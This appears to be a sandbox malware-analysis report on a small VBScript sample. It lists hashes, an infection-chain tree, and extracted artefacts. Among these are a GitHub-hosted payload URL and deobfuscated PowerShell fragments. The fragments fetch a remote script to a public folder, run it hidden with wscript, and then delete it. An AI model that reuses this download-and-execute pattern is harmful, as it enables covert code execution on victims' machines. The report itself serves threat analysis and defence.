Malicious
Malicious

9e9a2f6ef6b242edfccfece4cade10ef

VBScript
|
MD5: 9e9a2f6ef6b242edfccfece4cade10ef
|
Size: 914 B
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
9e9a2f6ef6b242edfccfece4cade10ef
Sha1
11a355c4173f3f5bc1d3a1fa0e04e0a266a7ba4e
Sha256
0faf7067e45c2a3289cc58532cc1e31c976d84ea943bbe613f7c95bbc7d715f6
Sha384
9679df132abe8cc3e938cb9b33a67f38c9e49f09a6f82b649668fd1ad53633feac753ffed1473e6bff2b65fc0b22fefa
Sha512
305e3e2280a849eb7e7531150604a06bcf3e633263dbf2980851af7a5760286c5b21bcb4628d494c16e23a05ea78305fd617faf0f4560c2e646139098014c6ed
SSDeep
24:9A+ssSZh+J4QGMG2k+AcD0rR6nG5CtRMWfej8qWY/Van:eWe+6Qlzd0ruG8tRPfeL/E
TLSH
E111EF0B6D18D4B64970C0875C64A91DEDC3A413400E5DB1F21D480C9F397BAA5C1C97
File Structure
9e9a2f6ef6b242edfccfece4cade10ef
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
9e9a2f6ef6b242edfccfece4cade10ef.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

https://raw.githubusercontent.com/respaldorere/respaldomaximo/main/cmd.txt
Deobfuscated PowerShell

" & Chr(34) & " try { Invoke-WebRequest -uri "" & trimmedUrl & "" -OutFile "C:\Users\Public\script1.vbs" Start-Process -WindowStyle "Hidden" "wscript.exe" "C:\Users\Public\script1.vbs" Start-Sleep -s 10 Remove-Item "C:\Users\Public\script1.vbs" -Force } catch { } " & Chr(34) runShell.Run psCmd, 0, False success = True Exit For End If End If WScript.Sleep 3000 Next"
Deobfuscated PowerShell

"try { iwr -uri '"
9e9a2f6ef6b242edfccfece4cade10ef (914 B)
File Structure
9e9a2f6ef6b242edfccfece4cade10ef
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
9e9a2f6ef6b242edfccfece4cade10ef.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
URLs in VB Code - #1

https://raw.githubusercontent.com/respaldorere/respaldomaximo/main/cmd.txt

9e9a2f6ef6b242edfccfece4cade10ef
Deobfuscated PowerShell

" & Chr(34) & " try { Invoke-WebRequest -uri "" & trimmedUrl & "" -OutFile "C:\Users\Public\script1.vbs" Start-Process -WindowStyle "Hidden" "wscript.exe" "C:\Users\Public\script1.vbs" Start-Sleep -s 10 Remove-Item "C:\Users\Public\script1.vbs" -Force } catch { } " & Chr(34) runShell.Run psCmd, 0, False success = True Exit For End If End If WScript.Sleep 3000 Next"

Malicious

9e9a2f6ef6b242edfccfece4cade10ef > [PowerShell Command]
Deobfuscated PowerShell

"try { iwr -uri '"

Malicious

9e9a2f6ef6b242edfccfece4cade10ef > 9e9a2f6ef6b242edfccfece4cade10ef.deobfuscated.vbs > [Command #0] > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙